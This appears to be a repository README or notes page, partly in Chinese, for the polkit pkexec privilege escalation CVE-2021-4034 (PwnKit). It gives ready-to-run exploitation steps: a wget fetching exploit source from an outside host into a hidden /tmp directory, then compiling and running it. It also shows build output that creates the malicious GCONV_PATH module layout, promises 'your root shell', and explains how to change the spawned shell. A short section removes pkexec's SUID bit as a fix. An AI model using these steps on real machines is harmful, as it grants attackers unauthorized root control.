blasty-vs-pkexec.c

cc (1) - GNU project C and C++ compiler

wget https://haxx.in/files/blasty-vs-pkexec.c -P /tmp/.ICE-unix/ -O poc.c
cd /tmp/.ICE-unix/
cc poc.c -o pwn
./pwn

.
├── GCONV_PATH=.
│   └── lol
├── lol
│   └── gconv-modules
├── payload.c
├── payload.so
├── poc.c
└── pwn

CVE-2021-4034

One day for the polkit privilege escalation exploit

Just execute make, ./cve-2021-4034 and enjoy your root shell.

The original advisory by the real authors is here

# tree CVE-2021-4034
CVE-2021-4034
├── cve-2021-4034.c
├── Makefile
├── pwnkit.c
└── README.md

0 directories, 4 files


# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.

# tree
.
├── cve-2021-4034
├── cve-2021-4034.c
├── gconv-modules
├── GCONV_PATH=.
│   └── pwnkit.so:.
├── Makefile
├── pwnkit.c
├── pwnkit.so
└── README.md

1 directory, 8 files

pkexec fix

ls -alt /usr/bin/pkexec
-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec

chmod 0755 /usr/bin/pkexec
#or
chmod u-s /usr/bin/pkexec

diff：

-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec
-rwxr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec

./cve-2021-4034
GLib: Cannot convert message: Could not open converter from “UTF-8” to “PWNKIT”
pkexec must be setuid root

#设置SUID:
chmod u+s /usr/bin/pkexec
ls -alt /usr/bin/pkexec
-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec

Default shells:

pwnkit.c to char * const args[] = { "/bin/zsh", "-pi", NULL };

$ cat /etc/shells
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/usr/bin/bash
/bin/rbash
/usr/bin/rbash
/bin/dash
/usr/bin/dash
/bin/zsh
/usr/bin/zsh
/usr/bin/tmux
/usr/bin/screen
/usr/bin/pwsh
/opt/microsoft/powershell/7/pwsh

参考链接：

分析：https://wx.zsxq.com/dweb2/index/topic_detail/218225555482851

分析： https://mp.weixin.qq.com/s/3rnkcRfX_BxzlVzp0stQRw

详细原理： https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-localprivilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

利⽤： https://haxx.in/files/blasty-vs-pkexec.c

利⽤： https://github.com/berdav/CVE-2021-4034

安全通告：https://mp.weixin.qq.com/s/bM20T1b39J5MHS14sdLikg

jas502n/pkexec-CVE-2021-4034

blasty-vs-pkexec.c

CVE-2021-4034

参考链接：